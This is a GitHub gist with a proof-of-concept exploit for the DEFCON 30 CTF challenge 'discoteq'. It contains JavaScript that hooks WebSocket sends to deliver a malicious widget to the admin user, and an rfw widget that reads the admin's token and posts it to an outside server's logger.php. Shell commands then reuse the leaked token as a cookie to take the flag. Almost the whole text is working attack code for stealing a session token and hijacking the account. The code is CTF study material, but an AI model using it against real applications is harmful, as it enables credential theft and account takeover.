Skip to content

Instantly share code, notes, and snippets.

@stypr
Last active May 30, 2022 02:41
Show Gist options
  • Save stypr/307123ec115f01eb30cd9963721802da to your computer and use it in GitHub Desktop.
Save stypr/307123ec115f01eb30cd9963721802da to your computer and use it in GitHub Desktop.
DEFCON 30 discoteq exploit PoC
// run before send
const originalSend = WebSocket.prototype.send;
window.sockets = [];
WebSocket.prototype.send = function(...args) {
if (window.sockets.indexOf(this) === -1)
window.sockets.push(this);
return originalSend.call(this, ...args);
};
// run after send
data = {
"type":"widget",
"widget":"@158.101.144.10/defcon_exp/exploit.php",
"author": {
"user":"1234#f8d4d5ab",
"platform":"web"
},
"recipients":[
"admin#13371337"
],
"data":{
"message":"styyyyyyyyyyyyyyyyyy",
"flag_url": "@158.101.144.10/defcon_exp/logger.php",
"apiGet": "/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495",
"apiVote": "/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495"
}
}
window.sockets[0].send(JSON.stringify(data));
import core.widgets;
import core.material;
import local;
widget root { loaded: false } = Container(
child: Column(
mainAxisAlignment: "center",
children: [
switch state.loaded {
true: Column(
children: [
Text(
text: data.new_token
),
ApiMapper(
url: data.data.apiGet,
jsonKey: "options",
dataKey: "poll_result",
onLoaded: event "api_post" {
path: data.data.flag_url,
body: {admin_token: data.new_token}
}
),
],
),
false: ApiMapper(
url: "/api/token",
jsonKey: "new_token",
dataKey: "new_token",
onLoaded: set state.loaded = true
),
},
],
),
);
$ snap install flutter
$ dart rfw_compile.dart
$ // upload exploit.rfw, send to admin, get admin_token
$ cat /tmp/leaked_token
{"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
$ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
{"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}
// snap install dart
// dart rfw_compile.dart
import 'dart:io';
import 'package:rfw/formats.dart';
void main() {
final String pluginZZ = File('exploit.rfwtxt').readAsStringSync();
File('exploit.rfw').writeAsBytesSync(encodeLibraryBlob(parseLibraryFile(pluginZZ)));
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment